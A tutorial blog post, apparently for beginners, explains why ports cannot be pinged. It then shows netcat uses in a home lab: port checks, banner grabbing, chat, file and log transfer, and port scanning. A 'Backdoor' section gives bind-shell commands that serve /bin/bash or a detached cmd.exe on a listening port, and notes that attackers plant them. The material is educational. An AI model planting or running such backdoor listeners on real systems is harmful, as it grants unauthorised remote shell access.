Beginner’s guide: OSSIM Part 2

-
Image
Hope all of you are keeping well. Thank you all for the overwhelming support you people are giving me. So today we’ll deal with everything from basic OSSIM configuration to integrating different types of assets. Before we jump in to all of that I hope all of you are ready with installation. If not please visit my previous post, which is actually the first part. Beginner’s guide: OSSIM (Open Source Security Information Management) part 1 Make sure you have an active internet connection for your OSSIM. As you all know the Alienvault platform has five modules in it, which are the Asset discovery, vulnerability assessment, threat detection, behavioural monitoring and security intelligence. In simple words we add assets first, and then we’ll configure all those assets under each and every module of Alienvault respectively. If you're ready with everything mentioned in part 1, we can now move forward with the configurations. Here we’re just considering only OSSIM not USM.
11 comments

Can you ping a port?

-


This is one of the top questions I hear at the time of a SIEM implementation. Most people (non-technical) think that just like doing a ‘ping’ to an IP address, we can do ping ports. Honestly, that is not possible. Then how can we actually check accessibility to a port, well there is a way. But before we jump in to it, we need to know a few basics about what a port is, and why we are not able to ping it.

What is a port?

A port is simply a logical connection place, where data is send in and out of a system using the TCP/IP protocols. In simple words, a network port is a location where information is being sent or received. While transferring data from A to B, a port will be always associated with IP address and the protocol (TCP/UDP) of a system and thus completes both source and destination of a session. Port numbers are from 0 to 65535 and they are separate for both UDP and TCP. Ports 0 to 1024 are reserved for use by certain privileged services like 21 for ftp 22 for ssh 23 for telnet etc.

What is a ping?

Most people don’t even know that the term ‘ping’ is the abbreviated form of Packet InterNet Groper. It is a simple utility which is commonly used to verify whether or not the packet from a system is capable of being sent across network to destination without any errors. Ping simply works like a radar/sonar which sends a signal and waits for the reply. The radar/sonar calculates the round trip time of the signal sent in order to calculate distance to the object. The ping works somewhat same like the sonar/radar instead of some signal it sends ICMP Echo request (32 byes in windows, 64 bytes in Linux by default)  and waits for the Echo reply. On receiving the echo reply it shows the round trip delay and the TTL value. The ping utility is mainly used for checking network reachability.

So why can’t we ping a port?

All of us are familiar with TCP/UDP protocols. ICMP is also a protocol, just like TCP and UDP. According to the TCP/IP suite, the ICMP, ARP, RARP, IGMP etc. falls under the internet layer. But all those application like FTP, Telnet, ssh etc. comes on top transport layer, i.e the application layer, which are associated with ports. These applications associate with ports in the application layer and then use TCP or UDP in the transport layer to send data. Hence they only respond whenever they have received a proper TCP/UDP requests to their respected ports. That is why we can’t ping (ICMP) to a port. Since ICMP request only reaches till network layer not beyond it (application layer).

How can we check accessibility to a port?

The only way to check whether you can reach to a port is by sending a proper TCP/UDP request to that port. So when an application responds to a request, we can conclude the port is accessible.  A common way is to telnet the port. But what I’ve seen across most clients are, they have policies in firewall, desktops etc. to prevent telnet traffic. The main concern they have is that the telnet sends traffic over network in clear text (not encrypted), so they have chosen ssh over telnet, which is a good recommended practice. In this blog post I’m introducing a small, handy, portable tool known as NETCAT, which has more features than a typical telnet.

The Netcat

The netcat is often known as the Swiss Army Knife for hackers. It is a simple networking utility used for reading or writing from TCP and UDP sockets using an easy to use interface. Hence, it is very popular amongst System / Network / Security Administrators because of its wide range of network debugging and investigation capabilities. Netcat can initiate TCP/UDP connections and send or receive TCP/UDP packets of data. It can listen to any arbitrary TCP/UDP ports, carry out port scanning or can even transfer data/files from one machine to another.
The main reason why I chose netcat is because, it stays running until either the source or destination side closes the connection.  Telnet can’t transfer any sort of arbitrary binary data, because certain characters will be interpreted by telnet application itself.  Those parameters are then removed from the data stream.  Telnet is incapable for listening to inbound connections. And also can’t use UDP instead.  But in other hand, our netcat doesn't have any of these limitations; it is much faster and convenient to use when compared with telnet.
That’s much of theory; now let’s move on how to use netcat

For demonstration purpose I’m using 3 machines here,

  • Kalilinux                           :192.168.146.131
  • Metasploitable linux        :192.168.146.132
  • Windows 7                      :192.168.146.1

Downloading Netcat

There are plenty of download links in internet. But majority of them are malwares. Always choose trusted sources to download. I’m quoting a link below, if you want to download netcat.
https://sourceforge.net/projects/nc110/
http://netcat.sourceforge.net/download.php
If you have nmap installed, netcat will be also installed along with it.

Checking out the port

I’ve got plenty of port open in my Metasploitable linux. My prime objective will be to check whether port 2121 of metasploitable is accessible or not. 

#nc 192.168.146.132 2121

All you need to do is, call netcat command with nc followed with IP address and port number as arguments.


At first the firewall was blocking the port so it gave me connection refused. Then I shut down the firewall and tried again. The netcat gave me a neat response from the port, which has application name, application version, OS of the server and the server’s IP address.
There are lots of other features/uses of netcat. I’m adding a few below, which I feel very handy in some situations.

Banner Grabbing

Next is banner grabbing, simple way to identify which version of web server you are running. Simply connect to port 80 of the destination server, give a get request and hit ‘enter key’ twice

#nc 192.168.146.132 80
GET / HTTP/1.0


Chat mode

This how we run a simple chat application between two machines running netcat. This option comes very handy when you want to copy some serial keys, configurations to a colleague working at the other end. A machine should listen to port first, wait for connections just like a server, and then the second machine should connect to server. To quit from chat hit ‘ctrl+c’

#nc –l –p 12345

l= listening mode
p= port
#nc 192.168.146.131 12345


File transfer mode

Another wonderful feature of netcat, this comes helpful when you want to transfer a license key file, configuration file or literally any sort of file. The setup may look bit tricky but it is easy. First the destination should listen to a port and be should be ready to save the contents into a file. Here my destination machine is listening to port 12345 and it will write any contents received to file.txt. A timeout of 3 seconds is given along with the source side command, so that the transfer automatically closes in 3 seconds (assuming file transfer completes in less than 3 seconds).
 
#nc -l -p 12345 > out.file

l= listening mode
p= port
Destination will begin listening on port 1234 and will save the contents to file.txt
On the source side we run,

#nc -w 3 192.168.146.132 12345 < out.file

w= timeout for connections (keeps connected only for3 secs)

Source will copy the contents of file ‘file.txt’, and will send to port 12345, of destination 192.168.146.131 


Transfer with compression

This is used mainly to transfer huge files like logs etc. Only difference is that here we call tar package to compress files for us and then send to destination. Here I have asked netcat to compress apache logs and ready with it on port 12345, on demand. On the receiving end I asked netcat to connect to same port of the source and copy the contents as a tar file

#tar c /var/log/apache2 | nc -q 10 -l -p 12345

l= listening mode
p= port
q=quit after EOF (waits for specified number of seconds and then quit)

#nc -w 10 192.168.146.132 12345 > log.tar

w= timeout for connections (keeps connected for 10 secs)

Backdoor

A simple method if you want to give shell access temporarily to a person. It is also called the backdoor method, since hacker  plant netcat listening to a port so that they can have easy access when even they want.

Linux

#nc -l -p 12345 -e /bin/bash

Opens a port a ready to send linux bash(shell)
l= listening mode
p= port
e= program to execute

#nc 192.168.146.132 12345

Netcat connects to the backdoor.


Windows

#nc.exe -l –p 12345 –e cmd.exe –d

l= listening mode
p= port
e= program to execute
d=detach from console or background mode

#nc 192.168.146.1 12345

Netcat connects to the backdoor.


Port Scanner

Net cat can also be used as a quick port scanner if necessary.

#nc –v –n –w 2 –z 192.168.146.132 1-1024

v=verbose mode
n=numeric-ip only
w= timeout for connections (keeps connected for 2 secs per port)
z=zero-i/o mode used for scanning.


Please follow the link to see netcat in action
https://youtu.be/Bh0nEUaKcR8

Comments

Post a Comment

Popular posts from this blog

Beginner’s guide: OSSIM (Open Source Security Information Management) part 1

-
Image
As we always do, we’ll start from the scratch, the very basics. OSSIM is most widely used open source SIM tool. The appliance is developed by the Alienvault. Other than OSSIM there are lots of open source SIM like LOGalyze, Kustodian, Prelude etc. But out of these SIM tools, OSSIM is my favorite. It is much user friendly and very stable with respect to performance and resilience. They also have a very good documentation center which gives step-by-step instructions and very good community forum to get help Before we start, if you haven’t seen my blog post on SOC please go through it first. http://pentesterblogs.blogspot.in/2017/05/beginners-guide-how-to-setup-soc.html
Read more

Beginner’s guide: OSSIM Part 2

-
Image
Hope all of you are keeping well. Thank you all for the overwhelming support you people are giving me. So today we’ll deal with everything from basic OSSIM configuration to integrating different types of assets. Before we jump in to all of that I hope all of you are ready with installation. If not please visit my previous post, which is actually the first part. Beginner’s guide: OSSIM (Open Source Security Information Management) part 1 Make sure you have an active internet connection for your OSSIM. As you all know the Alienvault platform has five modules in it, which are the Asset discovery, vulnerability assessment, threat detection, behavioural monitoring and security intelligence. In simple words we add assets first, and then we’ll configure all those assets under each and every module of Alienvault respectively. If you're ready with everything mentioned in part 1, we can now move forward with the configurations. Here we’re just considering only OSSIM not USM.
Read more

Beginner’s guide: How to setup a SOC (Security Operations Center)

-
Image
Lot of people asks me to put something about setting up a SOC. So from today onwards, I’ll be posting articles about, how to set up a SOC. Unlike my other tutorials, SOC is not a specific tool/device, which you can simply ‘fit and forget’. So you need lots of patience and hard work to build one. As usual I’ll posting set-by-step instructions from planning to setting up the SOC.   But before that we need to learn some basics. We need all of you networking, system administration and security skills for this. As a minimum requirement to start, you need to have the following skills Networking basics (Preferred CCNA) Basic system administration (Linux and windows) Security administration (Firewall / UTM management) In other words if know how to configure networking devices, knows how to install package in windows and Linux, and knows at least how to open close ports in firewall, then we’re good to go. I’ve tried my best to write the article from the very basics stuff.
Read more